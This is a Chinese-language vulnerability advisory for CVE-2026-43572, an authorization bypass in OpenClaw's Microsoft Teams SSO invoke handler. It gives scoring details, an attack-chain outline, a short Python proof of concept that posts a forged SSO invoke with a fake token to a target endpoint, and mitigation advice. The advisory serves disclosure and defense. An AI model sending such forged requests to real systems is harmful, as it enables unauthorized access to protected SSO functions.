CVE-2026-43572 CVSS 5.3 中危

CVE-2026-43572 OpenClaw Teams SSO未授权访问漏洞

披露日期: 2026-05-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-43572

漏洞类型

权限绕过

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 在 2026.4.10 至 2026.4.14 之前的版本中存在安全漏洞。该漏洞位于 Microsoft Teams SSO 调用处理程序中，由于缺少对发送方的授权检查，导致系统未能应用白名单验证机制。攻击者可以利用这一缺陷，通过发送特制的 SSO 调用请求，无需经过身份验证即可绕过发送者授权。这使得未经授权的第三方能够访问 Teams SSO 登录功能，从而获取敏感信息或执行未授权操作。

技术细节

该漏洞的根源在于 OpenClaw 处理 Microsoft Teams SSO 请求时的逻辑缺陷。在正常的业务流程中，应用应验证传入的 invoke 请求是否来自合法的 Microsoft Teams 服务，通常通过验证特定的 HTTP 头部或令牌来实现。然而，受影响的 OpenClaw 版本在 SSO 处理程序中未实施这一关键的发送方白名单检查。攻击者可以通过网络向目标端点发送伪造的 SSO 调用数据包。由于系统未对请求来源进行校验，攻击者能够在无需用户交互和认证的情况下（AV:N/PR:N/UI:N）触发漏洞。利用此漏洞可能导致低级别的机密性泄露（C:L），允许攻击者介入 SSO 流程。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标网络上运行 OpenClaw 2026.4.10 至 2026.4.14 之前版本的实例，并确定其 Microsoft Teams SSO 处理端点。

STEP 2

步骤2：发送恶意请求

攻击者构造一个特制的 SSO invoke 请求，该请求包含恶意的负载，但缺失合法的发送方授权信息。

STEP 3

步骤3：绕过验证

由于 OpenClaw 未检查发送方白名单，系统接收并处理了该未经授权的请求。

STEP 4

步骤4：未授权访问

攻击者成功触发 Teams SSO 登录功能，获取了本应受保护的上下文信息或访问权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# Target URL (Replace with actual endpoint)
target_url = "https://target-openclaw-instance/api/teams/sso/invoke"

# Malicious payload mimicking a Teams invoke request
payload = {
    "type": "invoke",
    "name": "ssoSignIn",
    "from": {
        "id": "attacker-controlled-id",
        "name": "Attacker"
    },
    "value": {
        "authentication": {
            "token": "fake_token_bypass_validation"
        }
    }
}

headers = {
    "Content-Type": "application/json"
    # Note: No authorization headers required due to the vulnerability
}

try:
    response = requests.post(target_url, data=json.dumps(payload), headers=headers)
    if response.status_code == 200:
        print("[+] Exploit successful! Authorization bypassed.")
        print("[+] Response:", response.text)
    else:
        print("[-] Exploit failed or target patched.")
except Exception as e:
    print(f"Error: {e}")

影响范围

OpenClaw 2026.4.10

OpenClaw < 2026.4.14

防御指南

临时缓解措施

如果无法立即升级，建议在网络边界部署 WAF 规则，拦截不符合 Microsoft Teams 合法流量特征的 SSO 调用请求，并临时禁用相关的 SSO 功能接口。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表